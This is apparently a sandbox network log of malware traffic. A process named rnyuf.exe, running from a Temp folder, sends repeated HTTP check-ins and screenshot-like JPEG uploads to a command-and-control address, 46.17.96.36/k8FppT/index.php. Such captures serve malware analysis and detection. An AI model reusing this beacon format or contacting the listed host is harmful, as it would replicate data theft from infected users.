                                        Aug 29, 2021 22:28:38.522881985 CEST15524OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:38.523011923 CEST15528OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:38.523174047 CEST15531OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:38.523196936 CEST15534OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:38.666209936 CEST15604INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        241192.168.2.44998046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:38.713371992 CEST15604OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:38.791438103 CEST15605INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        242192.168.2.44998146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:39.113107920 CEST15605OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:39.191286087 CEST15695INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        243192.168.2.44998246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:39.115164042 CEST15606OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:39.115245104 CEST15606OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:39.115437984 CEST15616OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:39.115556002 CEST15619OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:39.148156881 CEST15622OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:39.148230076 CEST15624OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:39.148257971 CEST15630OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:39.148667097 CEST15635OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:39.148704052 CEST15639OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:39.148865938 CEST15644OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:39.181235075 CEST15647OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:39.286112070 CEST15714INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        244192.168.2.44998346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:39.386573076 CEST15715OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:39.468265057 CEST15716INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        245192.168.2.44998446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:39.803431034 CEST15716OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:39.881725073 CEST15806INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        246192.168.2.44998546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:39.803626060 CEST15717OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6bae687b4eb1df836ed8aa51280f2dcd
                                        Host: 46.17.96.36
                                        Content-Length: 111957
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:39.803725004 CEST15717OUTData Raw: 2d 2d 2d 2d 2d 2d 36 62 61 65 36 38 37 62 34 65 62 31 64 66 38 33 36 65 64 38 61 61 35 31 32 38 30 66 32 64 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6bae687b4eb1df836ed8aa51280f2dcdContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:39.803901911 CEST15727OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:39.804024935 CEST15730OUTData Raw: 00 d0 46 e7 fe f9 8f ff 00 88 a3 ec 93 ff 00 d0 46 e7 fe f9 8f ff 00 88 a0 0b 74 55 4f b2 4f ff 00 41 1b 9f fb e6 3f fe 22 8f b2 4f ff 00 41 1b 9f fb e6 3f fe 22 80 2d d1 55 3e c9 3f fd 04 6e 7f ef 98 ff 00 f8 8a 5f b2 4f ff 00 41 1b 9f fb e6 3f
                                        Data Ascii: FFtUOOA?"OA?"-U>?n_OA?"-U>?n>?n[}1}1nI#s|QI#s|P*'G'@d7?Ed7?E[
                                        Aug 29, 2021 22:28:39.838860989 CEST15732OUTData Raw: ed ff 00 0a ce d2 bf e4 0f 65 ff 00 5c 13 ff 00 41 15 61 f5 09 ed 94 ac da 7c ed 06 3e 59 a0 fd e0 fc 54 7c c3 f0 06 be 6b 06 9d 49 ca 0f 53 d5 ad 25 08 a9 16 1a d6 15 e7 69 51 ea 0d 79 47 8f fe 12 e9 0b 61 ad f8 96 1b eb d5 b9 54 96 ed a3 62 ac
                                        Data Ascii: e\Aa|>YT|kIS%iQyGaTbC{_bO_#F}m%lF5JW'.uf|A(?Z_>;_kGw>GXW'iYi}VldSX{ehGW
                                        Aug 29, 2021 22:28:39.838896990 CEST15735OUTData Raw: c3 d0 fe 5f 5e d4 d6 d5 3c 69 2a f9 71 f8 7a d6 09 0f 1e 74 97 6a ca 3d f0 0e 6b a6 15 5a bb a4 d5 9b be ae cd 37 f9 fe 27 2c e9 27 65 55 3b a5 6d 15 d3 4b f2 fc 03 c5 92 0b 9d 7f c3 7a 74 5f 35 c7 db 56 e9 94 7f 0a 27 24 9f d7 f2 35 e2 9f 1b bf
                                        Data Ascii: _^<i*qztj=kZ7','eU;mKzt_5V'$5^*\j7?ln$T_?^*4atJe9+6<h J(=mGZ:jztX~URY=q0xq~5n9qg,M*Cl 9[PxS
                                        Aug 29, 2021 22:28:39.839044094 CEST15750OUTData Raw: fc 3b 7d 15 b7 88 74 b6 d4 26 61 a7 25 d4 46 e5 4e e6 5f 28 38 dd c0 e4 8d b9 e0 57 b3 dd 6a bf 06 2e 72 45 f3 40 c7 bc 51 5d 0f d0 a9 1f a5 78 85 86 89 ab 6a 91 4b 2e 9f a5 5f 5e 47 11 c4 8d 6f 6c f2 04 3e e5 41 c7 e3 45 9e 89 ab 6a 36 72 5d d8
                                        Data Ascii: ;}t&a%FN_(8Wj.rE@Q]xjK._^Gol>AEj6r]WV$gtBNXiIJ2=KG..4y2O,6j&!n>+YTA+zO}owHvd#VIY#=ccjx
                                        Aug 29, 2021 22:28:39.839067936 CEST15752OUTData Raw: 29 40 a0 04 a5 c5 2d 14 ec 2b 89 8a 05 2d 2f 6a 00 4e 71 46 3d a9 68 14 08 4d 83 d2 93 cb 06 9f 4a 38 a7 64 17 64 7e 57 a1 a4 31 35 4b 9a 70 a3 96 e1 cc ca db 18 76 a3 04 55 9a 31 9e d4 7b 30 e7 2a d2 d5 9d 8b e9 48 62 5a 5c 8c 7c e8 af 45 4f e4
                                        Data Ascii: )@-+-/jNqF=hMJ8dd~W15KpvU1{0*HbZ\|EOzi.VHZw&\LR){P SRSS(bb%(")1@R )S-10M(LBRKzJpAKIKLBJ(--+- @(R
                                        Aug 29, 2021 22:28:39.839178085 CEST15755OUTData Raw: bf 65 7d d2 44 ac d9 9d c7 24 0c f7 ab 27 e0 ef 86 17 83 66 4f b7 da 5c 1f d4 d7 63 a5 ff 00 c8 22 cb fe b8 27 fe 82 2b 59 40 fb 38 6e 87 19 af 98 a1 56 a5 59 38 b9 ca fe ac f6 65 4e 11 49 f2 af b8 f3 81 f0 83 c2 e3 ae 9b 31 fa 5c b9 fe b5 e2 fe
                                        Data Ascii: e}D$'fO\c"'+Y@8nVY8eNI1\)UZ|SY!}0x;_VW:W?Y/k9TC+)>:$4(+>ZsT]co}XbmQRei+]
                                        Aug 29, 2021 22:28:39.874212027 CEST15758OUTData Raw: d3 a4 1f e1 7a 60 99 87 7a 7a dc 38 e8 69 da 9b e8 2b d5 5d 48 8e 95 30 e9 83 51 36 9f 70 a7 ee 1a be 2e dc 77 a9 52 f1 bb d1 ec e9 3d 83 da d5 46 49 b5 98 7f 01 fc a9 a6 27 1d 54 d6 f0 bb 53 d5 69 de 74 2d f7 90 53 fa bc 5e cc 5f 58 92 dd 1c ee
                                        Data Ascii: z`zz8i+]H0Q6p.wR=FI'TSit-S^_X;R]G+G1KG01N@~b:GdE,M7Z-:j3Ne5~K*Go2SQs0Qv.6Np)1NRbSpU!1SH)H&)iE8UKbN
                                        Aug 29, 2021 22:28:39.874325991 CEST15769OUTData Raw: ae 68 cd 2f 67 11 96 0d dc bd db 3f 53 47 da e5 c7 de c7 d0 55 6c d2 d3 e4 8f 60 d8 b0 6e 65 61 cc 8c 7f 1a 69 91 9b ab 13 f5 a8 e8 a3 92 3d 82 ec 95 5c 83 9a e9 6f 6f 1e 2f 86 ad f3 72 f3 ed fc 2b 97 e8 2b 57 58 97 1f 0f a1 8f d6 e4 d7 0e 32 09
                                        Data Ascii: h/g?SGUl`neai=\oo/r++WX2zZRGbJEtk#6y#O4P+.AU_xuA2+}".JZo%-&)@QbHFza!8[[Y'[8&.6!si,d|t8
                                        Aug 29, 2021 22:28:39.983489990 CEST15829INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        247192.168.2.44998646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:40.094607115 CEST15830OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:40.169133902 CEST15830INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        248192.168.2.44998746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:49.401186943 CEST15832OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:49.478007078 CEST15921INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        249192.168.2.44998846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:49.407131910 CEST15832OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:49.407206059 CEST15833OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:49.407388926 CEST15843OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:49.407582045 CEST15845OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:49.439764023 CEST15854OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
